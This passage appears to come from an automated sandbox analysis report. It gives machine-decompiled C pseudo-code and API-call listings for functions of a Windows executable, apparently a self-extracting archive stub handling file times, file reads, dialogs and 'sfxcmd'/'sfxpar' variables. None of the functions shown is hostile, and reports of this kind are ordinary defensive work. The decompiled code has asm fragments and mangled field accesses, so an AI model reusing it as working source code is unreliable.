                                            0x00c5968b
                                            0x00c5968d
                                            0x00000000
                                            0x00000000
                                            0x00c59693
                                            0x00c596a5
                                            0x00c596aa
                                            0x00c596ae
                                            0x00000000
                                            0x00000000
                                            0x00c596bb
                                            0x00c596f5
                                            0x00c596f8
                                            0x00c596fb
                                            0x00c596fd
                                            0x00c596ff
                                            0x00c59701
                                            0x00c5974d
                                            0x00c5974d
                                            0x00c5974f
                                            0x00c5974f
                                            0x00c59751
                                            0x00c5978b
                                            0x00c5978c
                                            0x00000000
                                            0x00c59791
                                            0x00c59765
                                            0x00c5976a
                                            0x00c5976c
                                            0x00000000
                                            0x00000000
                                            0x00c59770
                                            0x00c59771
                                            0x00c59772
                                            0x00c59775
                                            0x00c597b1
                                            0x00c597b4
                                            0x00c59777
                                            0x00c59777
                                            0x00c59778
                                            0x00c59778
                                            0x00c59785
                                            0x00c59787
                                            0x00c59789
                                            0x00c597ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c59789
                                            0x00c59703
                                            0x00c59706
                                            0x00c59708
                                            0x00c5970a
                                            0x00c5970c
                                            0x00c5970f
                                            0x00c59714
                                            0x00c5972f
                                            0x00c59731
                                            0x00c5973b
                                            0x00c5973d
                                            0x00c5973e
                                            0x00c59740
                                            0x00000000
                                            0x00000000
                                            0x00c59742
                                            0x00c59748
                                            0x00c59748
                                            0x00000000
                                            0x00c59748
                                            0x00c59716
                                            0x00c59718
                                            0x00c5971c
                                            0x00c59721
                                            0x00c59723
                                            0x00c59725
                                            0x00000000
                                            0x00000000
                                            0x00c59727
                                            0x00000000
                                            0x00c59727
                                            0x00c596bd
                                            0x00c596c2
                                            0x00000000
                                            0x00000000
                                            0x00c596c8
                                            0x00c596ca
                                            0x00000000
                                            0x00000000
                                            0x00c596e6
                                            0x00c596ea
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c596f0
                                            0x00c59623
                                            0x00c59625
                                            0x00c59627
                                            0x00c5962f
                                            0x00c5964e
                                            0x00c59650
                                            0x00c5965a
                                            0x00c5965c
                                            0x00c5965d
                                            0x00c5965f
                                            0x00000000
                                            0x00000000
                                            0x00c59665
                                            0x00c5966b
                                            0x00c5966b
                                            0x00000000
                                            0x00c5966b
                                            0x00c59633
                                            0x00c59637
                                            0x00c5963c
                                            0x00c59640
                                            0x00000000
                                            0x00000000
                                            0x00c59646
                                            0x00000000
                                            0x00c59646

                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C5451B,00C5451B,?,?,?,00C597F6,00000001,00000001,31E85006), ref: 00C595FF
                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C597F6,00000001,00000001,31E85006,?,?,?), ref: 00C59685
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C5977F
                                            • __freea.LIBCMT ref: 00C5978C
                                              • Part of subcall function 00C57A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C52FA6,?,0000015D,?,?,?,?,00C54482,000000FF,00000000,?,?), ref: 00C57ABC
                                            • __freea.LIBCMT ref: 00C59795
                                            • __freea.LIBCMT ref: 00C597BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                            • String ID:
                                            • API String ID: 1414292761-0
                                            • Opcode ID: a6f132f1c3cd8b9334366cec97c87f2585d59a3c280bbfdd46151928a293eefa
                                            • Instruction ID: 13dba3e036ed9e24bacf7e6def2e9246b24088070474b8be824dc7f215a49066
                                            • Opcode Fuzzy Hash: a6f132f1c3cd8b9334366cec97c87f2585d59a3c280bbfdd46151928a293eefa
                                            • Instruction Fuzzy Hash: 4F51567A610216EFDB258F20CC81EBF37A9EB44791F1442A9FC14D6140EB30DDC8D6A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C40910, Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 65%
                                            			E00C40910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				intOrPtr _t47;
				long _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v48.wYear =  *_t66;
				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E00C3A995() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16); // executed
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t61 = _v72.dwHighDateTime.dwLowDateTime;
						_t72 = _v72.dwLowDateTime;
					}
					 *_t76 = E00C4DDC0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t47 =  *((intOrPtr*)(_t66 + 0x18));
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}
















                                            0x00c40910
                                            0x00c40914
                                            0x00c40923
                                            0x00c40925
                                            0x00c4092e
                                            0x00c40937
                                            0x00c40940
                                            0x00c40949
                                            0x00c40952
                                            0x00c40959
                                            0x00c4095e
                                            0x00c40972
                                            0x00c40a0e
                                            0x00c40a10
                                            0x00c40978
                                            0x00c40984
                                            0x00c409aa
                                            0x00c409bb
                                            0x00c409cb
                                            0x00c409d7
                                            0x00c409df
                                            0x00c409e5
                                            0x00c409ed
                                            0x00c409f3
                                            0x00c409f5
                                            0x00c409f9
                                            0x00c40986
                                            0x00c40990
                                            0x00c40996
                                            0x00c4099a
                                            0x00c4099a
                                            0x00c40a05
                                            0x00c40a07
                                            0x00c40a07
                                            0x00c40a13
                                            0x00c40a16
                                            0x00c40a18
                                            0x00c40a22

                                            APIs
                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C4096E
                                              • Part of subcall function 00C3A995: GetVersionExW.KERNEL32(?), ref: 00C3A9BA
                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C40990
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C409AA
                                            • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00C409BB
                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C409CB
                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C409D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Time$File$System$Local$SpecificVersion
                                            • String ID:
                                            • API String ID: 2092733347-0
                                            • Opcode ID: f46b2f46d398ec19cf1092436b5522016613d7b0c345e58d02c7dc3fdd67b3b0
                                            • Instruction ID: 244f6c43ba21fc271954b5ff1348edaf89c59de86b611d5d272cf5f9be065ddd
                                            • Opcode Fuzzy Hash: f46b2f46d398ec19cf1092436b5522016613d7b0c345e58d02c7dc3fdd67b3b0
                                            • Instruction Fuzzy Hash: D831D57A1183459BC710DFA5C8809ABB7F8FF98704F04491EFA99D3210E730D549CB6A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39768, Relevance: 7.6, APIs: 5, Instructions: 116filetimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00C39768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E00C4D940();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00C36EF9( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E00C3FAB1(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E00C3B32C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}














                                            0x00c39768
                                            0x00c3976d
                                            0x00c39773
                                            0x00c3977c
                                            0x00c3977e
                                            0x00c39789
                                            0x00c39794
                                            0x00c39790
                                            0x00c39790
                                            0x00c39790
                                            0x00c3979a
                                            0x00c397a2
                                            0x00c397aa
                                            0x00c397b3
                                            0x00c397b5
                                            0x00c397b5
                                            0x00c397c0
                                            0x00c397c5
                                            0x00c397c7
                                            0x00c397c7
                                            0x00c397dc
                                            0x00c397e0
                                            0x00c397e9
                                            0x00c397eb
                                            0x00c397eb
                                            0x00c39804
                                            0x00c3980a
                                            0x00c3980f
                                            0x00c39873
                                            0x00c39878
                                            0x00c3987f
                                            0x00c39888
                                            0x00c39893
                                            0x00c39893
                                            0x00c3989e
                                            0x00c398a1
                                            0x00c398a4
                                            0x00c398a7
                                            0x00c398ad
                                            0x00c398be
                                            0x00c398c2
                                            0x00c398c2
                                            0x00c398d2
                                            0x00c39811
                                            0x00c39817
                                            0x00c39833
                                            0x00c39862
                                            0x00c39867
                                            0x00c39869
                                            0x00c39869
                                            0x00000000
                                            0x00c39867
                                            0x00c3984c
                                            0x00c3984e
                                            0x00c39857
                                            0x00c39859
                                            0x00c39859
                                            0x00c39860
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c39860

                                            APIs
                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00C376F2,?,00000005,?,00000011), ref: 00C39804
                                            • GetLastError.KERNEL32(?,?,00C376F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C39811
                                            • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00C376F2,?,00000005,?), ref: 00C39846
                                            • GetLastError.KERNEL32(?,?,00C376F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C3984E
                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00C376F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C39893
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$CreateErrorLast$Time
                                            • String ID:
                                            • API String ID: 1999340476-0
                                            • Opcode ID: 9c7827dd1750aba8e9a3c86bb0fdea5a8c1953574f0ab6381bd605f7a1766f72
                                            • Instruction ID: 6bfa6fda295d23c19c96a38d9a2c6745f88296720b6978ef6a10ca7dfb8445f2
                                            • Opcode Fuzzy Hash: 9c7827dd1750aba8e9a3c86bb0fdea5a8c1953574f0ab6381bd605f7a1766f72
                                            • Instruction Fuzzy Hash: 154123718647466BE3209F20CC05BDABBE4FB42324F100719F9B1961D0D7F5AA89CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4A388, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4A388() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xc775c8; // 0x1c0078
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







                                            0x00c4a399
                                            0x00c4a3a1
                                            0x00c4a3aa
                                            0x00c4a3b0
                                            0x00c4a3b7
                                            0x00c4a3c8
                                            0x00c4a3cc
                                            0x00c4a3d6
                                            0x00000000
                                            0x00c4a3d6
                                            0x00c4a3be
                                            0x00c4a3c6
                                            0x00000000
                                            0x00000000
                                            0x00c4a3c6
                                            0x00c4a3e0

                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C4A399
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C4A3AA
                                            • IsDialogMessageW.USER32(001C0078,?), ref: 00C4A3BE
                                            • TranslateMessage.USER32(?), ref: 00C4A3CC
                                            • DispatchMessageW.USER32(?), ref: 00C4A3D6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$DialogDispatchPeekTranslate
                                            • String ID:
                                            • API String ID: 1266772231-0
                                            • Opcode ID: 5f73ea81ac2ccfe513297d6f8b4ed2cdc05c9f37477a3fc44dcf10644c2fd0d2
                                            • Instruction ID: 40a0b0f6ab7c7f3f50c278ef60a9a13bf7093bf9c0bc4f013a62c737bd531a68
                                            • Opcode Fuzzy Hash: 5f73ea81ac2ccfe513297d6f8b4ed2cdc05c9f37477a3fc44dcf10644c2fd0d2
                                            • Instruction Fuzzy Hash: 30F0B771E1122AAB8B20EFE6AC4CFEF7F6CEE156617004515F91AD2010E7A8D505CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C49A32, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C49A32(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00C41410( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








                                            0x00c49a42
                                            0x00c49a49
                                            0x00c49a51
                                            0x00c49a54
                                            0x00c49a61
                                            0x00c49a68
                                            0x00c49a70
                                            0x00c49a76
                                            0x00c49a76
                                            0x00c49a78
                                            0x00c49a7b
                                            0x00c49a80
                                            0x00000000
                                            0x00c49a80
                                            0x00c49a8a

                                            APIs
                                            • GetClassNameW.USER32(?,?,00000050), ref: 00C49A49
                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00C49A80
                                              • Part of subcall function 00C41410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C3ACFE,?,?,?,00C3ACAD,?,-00000002,?,00000000,?), ref: 00C41426
                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00C49A70
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                            • String ID: EDIT
                                            • API String ID: 4243998846-3080729518
                                            • Opcode ID: a26da8e8fa58674d33f54aad1184d5509270d2a3851fdcd64666c1da957f4436
                                            • Instruction ID: 880efbb79d653c51054ce3749ca8ac3c93a6f93702db70c54081e049113e07ff
                                            • Opcode Fuzzy Hash: a26da8e8fa58674d33f54aad1184d5509270d2a3851fdcd64666c1da957f4436
                                            • Instruction Fuzzy Hash: A6F08932F0122877D73096655C05FEF776CEB46B51F440165FD41A31C0D7B09A4296F6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C49AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 25%
                                            			E00C49AA0(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00C3FCFD(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xc6dffc(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xc6deb4( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00C4D820(); // executed
				 *0xc6df08(0xc775c0,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











                                            0x00c49aaf
                                            0x00c49ab6
                                            0x00c49ab9
                                            0x00c49ac2
                                            0x00c49aca
                                            0x00c49ad1
                                            0x00c49adb
                                            0x00c49ae6
                                            0x00c49aea
                                            0x00c49aed
                                            0x00c49af0
                                            0x00c49afa
                                            0x00c49b07

                                            APIs
                                              • Part of subcall function 00C3FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C3FD18
                                              • Part of subcall function 00C3FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C3E7F6,Crypt32.dll,?,00C3E878,?,00C3E85C,?,?,?,?), ref: 00C3FD3A
                                            • OleInitialize.OLE32(00000000), ref: 00C49AB9
                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C49AF0
                                            • SHGetMalloc.SHELL32(00C775C0), ref: 00C49AFA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                            • String ID: riched20.dll
                                            • API String ID: 3498096277-3360196438
                                            • Opcode ID: bedadec82271c69ab6c989ab0f7379cf7ec709e1f5e493a9d10b8bcd20b41b95
                                            • Instruction ID: 8b4545f6ff858c644dee20d9c0da9dffa82861a03ef2ad8954fe89964b85ef7b
                                            • Opcode Fuzzy Hash: bedadec82271c69ab6c989ab0f7379cf7ec709e1f5e493a9d10b8bcd20b41b95
                                            • Instruction Fuzzy Hash: 3DF0F471D4020DABC720AF99D845AEEFBFCEF54711F00416AE815A2251D7B456058BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4C891, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 66%
                                            			E00C4C891(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E00C4D940();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E00C3F835(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E00C3F94C() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}







                                            0x00c4c891
                                            0x00c4c899
                                            0x00c4c8a7
                                            0x00c4c8bc
                                            0x00c4c8c1
                                            0x00c4c8c5
                                            0x00c4c8ca
                                            0x00c4c8d4
                                            0x00c4c8cd
                                            0x00c4c8cd
                                            0x00c4c8d3
                                            0x00c4c8d3
                                            0x00c4c8e3
                                            0x00c4c8e3
                                            0x00c4c8ed

                                            APIs
                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C4C8A7
                                            • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C4C8E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: EnvironmentVariable
                                            • String ID: sfxcmd$sfxpar
                                            • API String ID: 1431749950-3493335439
                                            • Opcode ID: a1ea83507cc6de330330ff110a070b2c6d3d35b4f2784cb18bbdb3df20f341c5
                                            • Instruction ID: 27038abda45bd150b8d7af898ef1209e2f899d8b9155ce6969b299b39f15bff7
                                            • Opcode Fuzzy Hash: a1ea83507cc6de330330ff110a070b2c6d3d35b4f2784cb18bbdb3df20f341c5
                                            • Instruction Fuzzy Hash: C0F0A7B2815225A6D7306FD19C49FAE776CAF15751F000066FD4496192DAA08D41E7F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3964A, Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 59%
                                            			E00C3964A(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00C39745(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00C3964A(_t25);
						}
					}
				}
				return _t15;
			}







                                            0x00c3964d
                                            0x00c39650
                                            0x00c39656
                                            0x00c39660
                                            0x00c39660
                                            0x00c39672
                                            0x00c3967a
                                            0x00c396d6
                                            0x00c3967c
                                            0x00c3967e
                                            0x00c39685
                                            0x00c3969e
                                            0x00c396a2
                                            0x00c396b3
                                            0x00c396b7
                                            0x00c396d1
                                            0x00c396d1
                                            0x00c396c3
                                            0x00c396c3
                                            0x00c396cc
                                            0x00000000
                                            0x00c396ce
                                            0x00c396ce
                                            0x00000000
                                            0x00c396ce
                                            0x00c396cc
                                            0x00c396a4
                                            0x00c396a4
                                            0x00c396ad
                                            0x00000000
                                            0x00c396af
                                            0x00c396af
                                            0x00c396af
                                            0x00c396ad
                                            0x00c39687
                                            0x00c39687
                                            0x00c3968f
                                            0x00000000
                                            0x00c39691
                                            0x00c39691
                                            0x00c39692
                                            0x00c39692
                                            0x00c39697
                                            0x00c39697
                                            0x00c3968f
                                            0x00c39685
                                            0x00c396de

                                            APIs
                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C3965A
                                            • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00C39672
                                            • GetLastError.KERNEL32 ref: 00C396A4
                                            • GetLastError.KERNEL32 ref: 00C396C3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
